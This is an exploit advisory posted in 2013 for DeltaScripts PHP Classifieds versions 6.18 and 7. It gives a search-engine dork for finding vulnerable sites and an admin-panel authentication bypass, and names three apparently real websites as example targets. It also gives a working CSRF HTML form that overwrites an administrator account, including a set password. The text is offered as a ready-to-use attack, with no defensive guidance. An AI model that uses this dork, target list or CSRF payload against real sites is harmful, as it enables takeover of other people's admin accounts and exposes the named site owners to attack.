facebook facebook twitter rss

deltascripts Group (PHP Classifieds v.6.18,v.7) Multiple Vulnerabilities

Author: AtT4CKxT3rR0r1ST , Published: 15-06-2013
deltascripts Group (PHP Classifieds v.6.18,v.7) Multiple Vulnerabilities
=======================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.deltascripts.com/phpclassifieds
####################################################################
PHP Classifieds v. 6.18
=======================
===[ Exploit ]===

.:. Dork : intitle:"PHP Classifieds from DeltaScripts" inurl:"/admin/"

Auth Bypass
============
www.site.com/admin/

Go To This Path [www.site.com/admin/] The Admin Panel Are Not Required Username And Password

Example:

http://autoactiv.3x.ro/anunturi/admin/
http://www.aviacaoexperimental.com/fotos_aviacao/classificados1/admin/
http://www.colclassifieds.com/admin/


PHP Classifieds v 7
====================
===[ Exploit ]===

CSRF Vulnerabilities (Add Admin)
================================

<html>
<head>
<title>PHP Classifieds [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/admin/admin_users.php">
<input type="hidden" name="adm_id" value="1"/>
<input type="hidden" name="adm_name" value="admin"/>
<input type="hidden" name="adm_pass" value="123456"/>
<input type="hidden" name="adm_level" value="0"/>
<input type="hidden" name="update" value="Update"/>
</form>

</body>
</html>

<input type="hidden" name="adm_id" value="1"/> ----------> adm_id= 1 or 2
####################################################################

Like us on Facebook :